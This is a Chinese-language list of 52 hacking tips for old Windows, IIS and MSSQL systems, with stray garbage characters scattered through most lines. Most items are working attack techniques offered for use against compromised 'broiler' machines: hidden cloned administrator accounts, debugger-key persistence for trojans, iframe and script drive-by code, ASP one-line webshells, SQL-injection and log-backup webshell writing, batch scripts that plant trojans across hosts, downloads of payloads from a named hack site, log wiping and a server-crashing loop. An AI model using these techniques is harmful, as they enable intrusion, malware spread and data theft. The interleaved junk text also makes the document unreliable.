Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
$ O" u7 l8 p- a. \. d$ ccacls C:\windows\system32 /G hqw20:R( M9 q5 X. u* e! E' v) F
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入7 `# ^# t2 p3 E3 J0 a# {
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F' A/ F$ |% a$ t. Z P% _
8 E$ u& G" U4 l) A2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。+ U# m; k% t3 F2 o' g7 C" \
1 l0 k" D+ ~4 `1 F4 X) ?) H3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
% N) y$ J O4 e& S$ W. }0 u0 `& ~8 z2 z" U# `
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
+ k5 {5 ~+ u7 p! R
3 ]( T3 X0 y( f5、利用INF文件来修改注册表
# e# f. _; A) s m! c8 q) g[Version]
# q* Z) D: o) | dSignature="$CHICAGO$"
9 ~! n# |* S. C6 w, _) T- y[Defaultinstall]" a5 M+ G# C% O% _, z) ^
addREG=Ating
* M9 y/ k1 \: V: z0 E[Ating]
6 Y% ?: m+ H* g7 H$ r8 j- X: @HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
2 k( p, v9 O6 I1 G* w# g) E/ w以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:) M& t6 a/ u" ~+ P6 }
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
- f0 X# h! B. U# x# d其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU4 k' l3 j/ J( ~. K# Q
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
0 N6 F8 a7 [: k7 rHKEY_CURRENT_CONFIG 简写为 HKCC
+ m6 K+ f! d# E: x0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
8 g8 X: {1 @# l1 r"1"这里代表是写入或删除注册表键值中的具体数据 u$ h) ]$ d+ W; w. @! ]3 Q/ {
5 n- L- s5 X6 R4 A6 K
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
7 {/ E- }8 m8 ?/ @: b多了一步就是在防火墙里添加个端口,然后导出其键值
. O t6 d/ L+ p8 e& X: u2 c[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]3 l1 `% a- J& t. I0 o
: b. A) ?2 r. N3 z7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
7 c& N) E3 u! N! e$ r3 n/ P在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
* Q t- X, \) ?1 F; v7 A$ t' o+ E3 E
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。" D2 }2 h) R9 I
" f8 H3 o$ N8 g6 w. d8 s2 c
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,7 `/ v2 K$ c/ f( S5 L1 b; Z
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。' s1 Z3 _2 \$ ] d X9 B: u8 v, M
9 O6 U$ a* N* A5 o: T
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
; s0 g7 m: S3 t C# [$ T
+ }: @( J# \8 M$ o" L" P11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
8 A* T: ]7 X4 [0 N/ R. V7 R+ l用法:xsniff –pass –hide –log pass.txt
% t3 g8 I+ E/ u4 h" p
4 l: |1 }1 ~: p2 T12、google搜索的艺术/ P; O' B* w$ G: n/ |1 ~- I
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
@! I4 Q1 q& `0 N6 ^- E! E' B或“字符串的语法错误”可以找到很多sql注入漏洞。0 A- `& Z. F/ k% A
/ [+ ?3 b- }3 E' x# G& b
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
3 c. y# J( h e! L/ T0 x+ D5 h$ q; k1 \/ F/ l6 ?
14、cmd中输入 nc –vv –l –p 1987
* `7 d* a1 I, I做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
' C0 R+ c9 p2 X& I% ^+ Z& e/ h5 p( ]
15、制作T++木马,先写个ating.hta文件,内容为+ I0 L3 ]( Q. U
<script language="VBScript">
0 W) t7 G) |/ M) @, ?. [% Tset wshshell=createobject ("wscript.shell" )/ r+ |+ f7 z9 I7 Z" p3 l; H ?2 [5 g
a=wshshell.run("你马的名称",1)
+ k2 R* g1 e! `0 S$ Kwindow.close
# _- R9 `5 x* K* D" S2 X! S</script>, L7 y0 ~( C: _9 ^1 l
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
5 Q; {; ^) N6 ` h$ u; Y) V+ E5 J# v1 R j
16、搜索栏里输入
2 m- e$ V S* P5 [' O关键字%'and 1=1 and '%'='1 A3 T' C) z' O9 C1 w
关键字%'and 1=2 and '%'=') S/ f6 }+ A% s+ I: t* n2 F
比较不同处 可以作为注入的特征字符( q# c( T0 O. ^% z5 u
1 x8 s# m6 |. n: b4 l3 u. ?17、挂马代码<html>
# O7 ~ H, C! a3 x4 b1 a- {<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
; l% X* Y. r7 V( s- ?1 q! ^</html>
7 R# k: o. w" }& T, l. {
: O$ q" s6 H$ h3 p+ o. P. ^. ]18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
6 j( I# I4 G' p- @$ s' Qnet localgroup administrators还是可以看出Guest是管理员来。
% T* f: j4 U, y0 }3 S6 M
5 T+ E* @' H# b. Z19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
@8 c$ h$ P; m3 j- {! ]; W" i \用法: 安装: instsrv.exe 服务名称 路径$ I3 G% K2 H3 y0 `: M! u# y2 W
卸载: instsrv.exe 服务名称 REMOVE
0 |7 @. L4 L- t6 |& |$ W
% l# `' k3 Y/ X6 o/ t1 C8 p& Y. e$ L0 _3 y% ~
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
5 S4 L4 w+ F5 `6 G+ k. [ s不能注入时要第一时间想到%5c暴库。' N8 r8 [' W, N1 f& T
! b$ W4 D3 x ~% W22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
0 U0 m) |- s! F
. j& h9 N( V' n: @4 \23、缺少xp_cmdshell时
6 L- P* X, N9 F( R' E尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
* p6 F7 k3 {* @ X0 a% y% {# J7 r/ L3 u2 q假如恢复不成功,可以尝试直接加用户(针对开3389的)) `) R2 T" o) J3 K" @) b5 h
declare @o int3 d; z! K) Y9 m @$ l1 s8 a
exec sp_oacreate 'wscript.shell',@o out
2 O1 o3 J. x! G* P2 C6 k0 {exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
C% l# ~' N' ?$ f: u4 f3 F+ U- R
% L0 K/ l/ W. T5 T' r7 f24.批量种植木马.bat. N1 T n2 b4 ^, I* B
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中$ |& f- ]7 u- ]) d1 f
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间# K2 N; L9 G; v# E& i: M. r
扫描地址.txt里每个主机名一行 用\\开头; ^$ _2 M5 E3 d' u6 B
" c2 }, b, c2 v/ A! ] n: }
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
- m' f4 v/ S4 R+ m" k, f& p9 j. \9 _
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
' D9 J$ x7 \: b1 [8 w; t将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.( y2 S- Y. q0 }( W* G# p6 l
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
& h) ]$ P8 B: \9 F6 ?- ?7 g( n! i! {3 Z0 P! |( g
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
1 ?9 w( Z9 V3 I- m% z然后用#clear logg和#clear line vty *删除日志
4 B# a* \ S& S1 O: H9 u! Q) M5 y7 c
28、电脑坏了省去重新安装系统的方法' O) [' N) U3 M- }
纯dos下执行,
; e: k9 ?% _6 f/ \xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
2 }4 ]; I, |0 ^) j: _8 K3 E$ S2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config" x+ V! g) |( Q5 d) V& k- e
7 [/ p7 D) m4 d; V, o; z
29、解决TCP/IP筛选 在注册表里有三处,分别是:
7 b3 ]- ^9 b& s: E; x3 iHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
: n+ Z2 _. L; h0 [, Y3 C, PHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
. D4 m* X3 m8 oHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip' [ k% W4 g/ l! Z6 b
分别用* c1 ~7 X7 f) t0 v
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip' c o& i0 ]2 D7 Q5 N/ p& y& O% M) f
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip* H l/ H) [8 ]( i
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
5 u4 e+ v7 U/ L0 I3 h% f命令来导出注册表项5 V$ O* y9 {. T7 {; L) ~* U9 k
然后把三个文件里的EnableSecurityFilters"=dword:00000001,
% R1 b& x% i! {8 p改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用 r& T& I9 o7 y+ I3 G
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。) l2 g3 f% x: {. S1 i+ Q
8 j4 n) e9 m% F [! X1 G f
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
3 C$ m: G8 G2 Q0 t+ y1 RSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
# R0 e s( {! \8 f4 R* u& u& k( a' E/ i. |: k+ N
31、全手工打造开3389工具
9 B7 s$ P* S! i+ E& u$ R. j' U" s打开记事本,编辑内容如下:
j6 S' |# U7 ^0 decho [Components] > c:\sql3 Z$ n8 f& t; F+ n+ F
echo TSEnable = on >> c:\sql. `7 X, t0 M' i4 I
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
5 U9 Y9 ]" d7 {: G I I编辑好后存为BAT文件,上传至肉鸡,执行% C: l9 o* P6 q6 l
2 [% S# Z! ~" i$ ]; M0 |3 v; v
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马6 a# q& h% Z& F# G
9 @3 k8 L3 m# p# M0 s" ?
33、让服务器重启
: n( B Z+ V; c写个bat死循环:
. p. m* M( x' O. _@echo off; l+ l( Z) H1 q; L: y5 [8 @
:loop1
1 c+ w6 N" A+ h) m4 Ccls
t, J" Y# S5 F$ I9 X* p" pstart cmd.exe
+ p! j/ g; N* _7 p0 G8 _6 V5 [goto loop1) t; e3 i) {: k6 l+ ?+ X
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启/ R. S4 g/ B4 t# q
7 [; t3 S- I6 R34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
5 r0 e) U' Q7 h$ Q1 B9 T@echo off
d6 ?8 V8 L* R$ e7 a' d. b1 z1 odate /t >c:/3389.txt Y5 u8 X3 N7 z
time /t >>c:/3389.txt
; f! k; G( ?, D. k' q7 z# R4 d/ X$ ^attrib +s +h c:/3389.bat
! w9 j- f* B0 H" ]/ N: }3 `3 d9 k$ oattrib +s +h c:/3389.txt1 P0 _5 M7 V! ~# ~" J' e
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt: [4 W8 D2 F7 A, J4 H- y
并保存为3389.bat- S/ s# x1 g7 N i% ]5 h
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号8 c& n) q6 S3 j( [6 p
; E' q) E9 q+ Q0 f35、有时候提不了权限的话,试试这个命令,在命令行里输入:; h" U2 D% E) E$ H; j
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
: h2 m6 z: |( s! J$ u5 B/ n输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。- K; i" }! ~3 c2 t
- d% w8 i! x5 w) l
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
4 T' n. r- M5 {! Q# K. V& i6 |5 wecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址 _( J9 P$ k9 x$ r5 J7 U; B5 p' P
echo 你的FTP账号 >>c:\1.bat //输入账号6 E# S" x# w* b# g; ?
echo 你的FTP密码 >>c:\1.bat //输入密码( \: Q* F8 E' T# t6 n
echo bin >>c:\1.bat //登入$ L/ o: H, B% c, I/ }
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么% v; E- ?3 H6 B, R" b6 c3 t1 q: i
echo bye >>c:\1.bat //退出
4 B' m( p+ z1 E" G% |然后执行ftp -s:c:\1.bat即可3 R7 k+ ^1 q; e- u( k3 U
" V1 D% h2 M$ w7 M7 i* O
37、修改注册表开3389两法
? a0 {. f" B( i' l* I$ i(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
; U6 r; {5 @' v7 Yecho Windows Registry Editor Version 5.00 >>3389.reg1 }8 S, A7 A9 e7 L6 U5 ^
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
" C4 E0 m h' y6 }" g2 S8 u# recho "Enabled"="0" >>3389.reg( C6 c) n. \4 n# P6 c& b8 Q E
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
, ]' k w: v+ C" |+ ANT\CurrentVersion\Winlogon] >>3389.reg6 l- j5 f3 s8 B4 U- r
echo "ShutdownWithoutLogon"="0" >>3389.reg
7 Y4 q% k8 |. e# A8 P5 g5 Decho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
$ b( H! _/ M8 [, E! @>>3389.reg
) Q. K; h9 N# {+ lecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg" ]8 e7 |: `( P! C% F
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
% U* o$ K ?. o. K>>3389.reg
4 t; M5 Y) z& u! E0 ~ Oecho "TSEnabled"=dword:00000001 >>3389.reg! H2 h, y! t V: @, V
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
5 `! ^2 `9 q" W0 c1 t( i( Gecho "Start"=dword:00000002 >>3389.reg
' J! H" c6 q& g5 N9 m8 P6 ^echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]% H9 G2 ~- }& C+ p* F
>>3389.reg3 p) v6 v' G8 T! r
echo "Start"=dword:00000002 >>3389.reg
; \' S- I" W g( Recho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg- H' ^- T' q) l; J
echo "Hotkey"="1" >>3389.reg
6 u' j7 [! F' @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal! {9 F" L3 M# j7 l+ C4 G% L' n: G9 p2 f
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
, k! J8 Z5 w, F0 k7 Z1 g$ eecho "PortNumber"=dword:00000D3D >>3389.reg
8 C! F: b( |1 v/ j* yecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal# g2 l8 |: N& p, {: T
Server\WinStations\RDP-Tcp] >>3389.reg
, S7 ]2 a. m* I' @- uecho "PortNumber"=dword:00000D3D >>3389.reg1 @' T7 r5 |/ v+ D9 p6 v
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。( s, |$ A7 E) }+ b
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
* ^3 z2 X8 t1 K6 X1 P因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
2 P( f* t$ ?6 t2 D% s(2)winxp和win2003终端开启
/ v2 s& r7 t6 Y h* l用以下ECHO代码写一个REG文件:) H3 V7 G2 O/ T- Z' ~) c1 E
echo Windows Registry Editor Version 5.00>>3389.reg" R4 r+ b3 `7 ^( _/ P7 m- i
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal0 n% h9 J; d4 t' _4 l
Server]>>3389.reg8 D" _# K% m9 ?2 L( o
echo "fDenyTSConnections"=dword:00000000>>3389.reg
8 ^; ?( f* ~# _" |3 Y- ]echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
+ t9 Y; r* I- H/ s* P) N* E) y* `Server\Wds\rdpwd\Tds\tcp]>>3389.reg/ l4 m |# w7 q/ Y. d5 h: c* T; U
echo "PortNumber"=dword:00000d3d>>3389.reg# p% r& s+ D) X: v; D
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal9 ?8 a K8 t& `, d5 L/ V( |
Server\WinStations\RDP-Tcp]>>3389.reg' t6 ] A& {) O: o
echo "PortNumber"=dword:00000d3d>>3389.reg0 N& [5 M% |+ F2 K# }/ q& [
然后regedit /s 3389.reg del 3389.reg8 M2 C" A1 x' d; ]; W6 f
XP下不论开终端还是改终端端口都不需重启5 W# W: n3 D% E7 @$ i
% ]/ i$ m* K7 D4 a
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃! }5 i- k3 G/ @, y; p9 G0 E1 P
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
/ G% }5 l+ b9 c" F" o6 p3 x
+ d1 W2 Z- W F! @" d3 L. Q39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
0 E3 d" N2 K- W% a# ](1)数据库文件名应复杂并要有特殊字符8 c/ H/ Z: }/ L, n
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
- k% }" s* \$ `! _将conn.asp文档中的5 s2 s6 ~2 `3 Y# \
DBPath = Server.MapPath("数据库.mdb")
2 n. f3 r, u1 Z; k5 T9 A3 |conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
]7 A1 W% H9 P- c S/ l# g5 y: |' ]( w
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置 E% |3 p& u7 l/ V; O; i
(3)不放在WEB目录里, B$ U4 k; v: \+ j1 {+ M( Y
4 I. _4 h; M' U. t40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
7 L+ \ k' {( t1 v: Q可以写两个bat文件
( Z" d3 f: r# x& u@echo off. U# ~6 k ]; B4 `
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe! Y6 D/ {$ z0 Q6 h. A% W
@del c:\winnt\system32\query.exe& n. r% e5 n! Q) }5 Z' L
@del %SYSTEMROOT%\system32\dllcache\query.exe
1 T) u' _' u8 N@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
0 P( F& c9 b" Y* Y& r& o9 T$ w5 s. l5 T' e
@echo off! g! F3 T# ]2 ^3 G% v( \* ]
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe/ g1 d" u$ v* `- x: l
@del c:\winnt\system32\tsadmin.exe
. k) C0 S2 p f; D. j5 h- F@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex) h( S' i5 w8 T& X6 n! ?
p0 C$ c' Z' Y4 j* B4 j4 f41、映射对方盘符
3 D3 _$ a5 f! ?+ Q6 g5 j4 Y# etelnet到他的机器上,
6 N# `- H! a+ G1 Y% n$ Nnet share 查看有没有默认共享 如果没有,那么就接着运行
& F" I2 I ]: ?. Z0 q" hnet share c$=c:
' d8 `+ ]) r7 y6 A* [$ {7 L7 B" X+ mnet share现在有c$
' f6 e& E, D- } ~ K$ ]: m8 @" Y7 S3 H' i在自己的机器上运行
: F( Z' O, X0 M6 b% A' U) tnet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K Q0 a% f# c) ~4 p$ B! o
' |1 x! X1 p. i6 L42、一些很有用的老知识
5 l9 \% }; Y8 }8 Itype c:\boot.ini ( 查看系统版本 )
2 i9 M, w% k$ L' D* j4 |net start (查看已经启动的服务), J- x# x" G1 d& g8 }
query user ( 查看当前终端连接 )) Y& Y% r; B8 s- g9 U! {! ]
net user ( 查看当前用户 )+ x( q q2 E+ B% Y6 O
net user 用户 密码/add ( 建立账号 )
) U& n0 g2 z8 Inet localgroup administrators 用户 /add (提升某用户为管理员)
: F+ o' b C1 J# xipconfig -all ( 查看IP什么的 )
4 S( d$ Z( m. Y% M/ D0 |netstat -an ( 查看当前网络状态 )4 q9 u& G4 S: ~9 V2 u' F
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)+ x- ~% Y( t$ X! {7 W% u* N# F
克隆时Administrator对应1F45 f& |5 C. q% `& U# m5 N
guest对应1F5( {$ D6 @7 L/ u
tsinternetuser对应3E8
' X; `' v+ q" b' d* J8 _
3 x& C( H+ {( E43、如果对方没开3389,但是装了Remote Administrator Service
' Z9 o2 t+ j% s) W) j9 T6 y用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接: h' f4 f3 y1 J/ @# w* i& m
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
1 Y: e8 N2 [( Y8 V6 m& U' n先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"! x) h- M m) q' c& f w# ~& Z
9 K* T3 K% H# E0 _6 J& B L
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
' P+ i" ^' P! G! S: R/ [* {9 h本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)" f I# u% G# i8 u4 o `! w+ U
, O& W, z- e1 ^
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
; `. Q2 j& C: h# d5 {5 becho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open( H! f; N! w) U9 o6 {( ~0 _" N
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
8 Q5 F& G* C+ n1 ~CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =! J+ o, x# A" S1 V- [
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs1 P, u; K" T" ]# C( ?
(这是完整的一句话,其中没有换行符)" [9 k1 [: Y, X3 ^( d6 y4 M
然后下载:
. k+ m/ j2 P1 U% f3 U$ U+ x- Lcscript down.vbs http://www.hack520.org/hack.exe hack.exe8 ~4 _4 a" K q# c u7 r7 u- }
6 @4 |# S2 u1 S46、一句话木马成功依赖于两个条件:
3 P9 R$ e' F% Y" Z1、服务端没有禁止adodb.Stream或FSO组件
& k- \' [6 y/ c' {8 o# B2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
- g* ?9 s: ? S, C+ E; P$ }) y7 j S8 N
( t0 C3 Q8 W9 n( z0 [47、利用DB_OWNER权限进行手工备份一句话木马的代码:
+ S3 J) }# \/ e3 h7 U' C* T;alter database utsz set RECOVERY FULL--9 b/ B0 ?' }) M4 j& F. p, C3 M( T
;create table cmd (a image)--9 t' i, C6 @ I' @
;backup log utsz to disk = 'D:\cmd' with init--0 X0 i4 R' ?# M+ q! N
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--0 B' V% W; g: {$ V8 l
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--: K* s% {% x( A n
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
, T. }2 y' z0 m1 d$ n% A; X$ x& d: M! b# T
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
% l* f- c) N s/ e( k, W) `* i/ ^9 V# `* J1 O
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
9 B" F, c* t. R4 Y5 I$ H- _+ w所有会话用 'all'。# `% i/ I9 |: }' |6 q" n' P: ]$ h
-s sessionid 列出会话的信息。
% b5 n: S" t1 L/ ^& I6 @8 j-k sessionid 终止会话。1 h3 E2 h% r* u9 n- r
-m sessionid 发送消息到会话。7 R$ M* h) d7 q
4 i1 U* a# p" {
config 配置 telnet 服务器参数。
$ P& u! w* t/ S1 _" K; R
p3 O0 B* J, Ocommon_options 为:# e G- ~+ c2 T3 W% q
-u user 指定要使用其凭据的用户; u( V' x+ E* B H t$ u! F8 t, P3 T
-p password 用户密码
1 d% h! i, |: c! I* G$ _: a+ R2 \! f* ^6 g K- I
config_options 为:
4 V: A6 T3 o& t+ y" n5 x( odom = domain 设定用户的默认域
. Y, C7 n+ q# A0 ?5 L+ y) g i" kctrlakeymap = yes|no 设定 ALT 键的映射
4 L& m, j2 m: E) z( _( u( ytimeout = hh:mm:ss 设定空闲会话超时值- q8 Y9 z& `: Q8 p- a; t# S$ z
timeoutactive = yes|no 启用空闲会话。, P) k% O4 U- y" t
maxfail = attempts 设定断开前失败的登录企图数。
3 Q1 g2 J! E; B) i+ z6 w3 xmaxconn = connections 设定最大连接数。" Z- z! V( ~7 G
port = number 设定 telnet 端口。1 m, b% N7 v: M7 F' A
sec = [+/-]NTLM [+/-]passwd$ q& ~" V* O2 U9 D
设定身份验证机构
! ~" [5 \1 @( R6 J( S; ifname = file 指定审计文件名。- Q1 K; z1 T7 n# e# E0 Z8 g
fsize = size 指定审计文件的最大尺寸(MB)。8 n: {: r8 v! Q" I* N
mode = console|stream 指定操作模式。
) K6 j! u* g2 X$ I) P8 rauditlocation = eventlog|file|both) p8 f4 o" M' G: s% J
指定记录地点1 l3 E x' V0 Q. K
audit = [+/-]user [+/-]fail [+/-]admin
9 k9 q+ ` O/ t3 n- B* {& ]
# f( w/ Y5 i0 P* C49、例如:在IE上访问:6 S8 M K4 e: N3 C2 p- ]: W
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/+ \1 ~# p, h2 _+ _1 A( u
hack.txt里面的代码是:- ?1 h F% _% y% {
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">/ \7 s/ c' Q: z3 k" E: ~
把这个hack.txt发到你空间就可以了!+ E3 H, G2 x; X/ I$ \4 I2 p
这个可以利用来做网马哦!
7 p8 U( J1 ^4 N; G/ g& R
' O' w! y- B E( q- ?' {50、autorun的病毒可以通过手动限制!) |& Z" K: m4 f* A% q% S. J4 v% V
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
2 S3 j6 E1 q/ _8 A: _$ i2,打开盘符用右键打开!切忌双击盘符~
. z' J$ w" }$ R% V2 z3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
: C5 _/ Y; e4 [- g7 p3 r( O) a! \" P2 Z; N7 q
51、log备份时的一句话木马:8 k6 z( v" O9 r% _% C2 `
a).<%%25Execute(request("go"))%%25>9 v4 M" a$ T- b4 v, ^
b).<%Execute(request("go"))%># ?' S: @% g6 m" _/ e5 T: g$ S
c).%><%execute request("go")%><%
3 p' f2 s% K( M1 ~$ [. M; Qd).<script language=VBScript runat=server>execute request("sb")</Script>
! |; e' K9 |9 De).<%25Execute(request("l"))%25>6 [* \ F+ M7 g B
f).<%if request("cmd")<>"" then execute request("pass")%>) n5 z# I& `7 | i/ ^
3 x3 }. p8 p: n$ w8 _2 f, e52、at "12:17" /interactive cmd
, Z+ x& l8 H1 @! Y" N1 Q执行后可以用AT命令查看新加的任务" |) g; {1 p, \
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
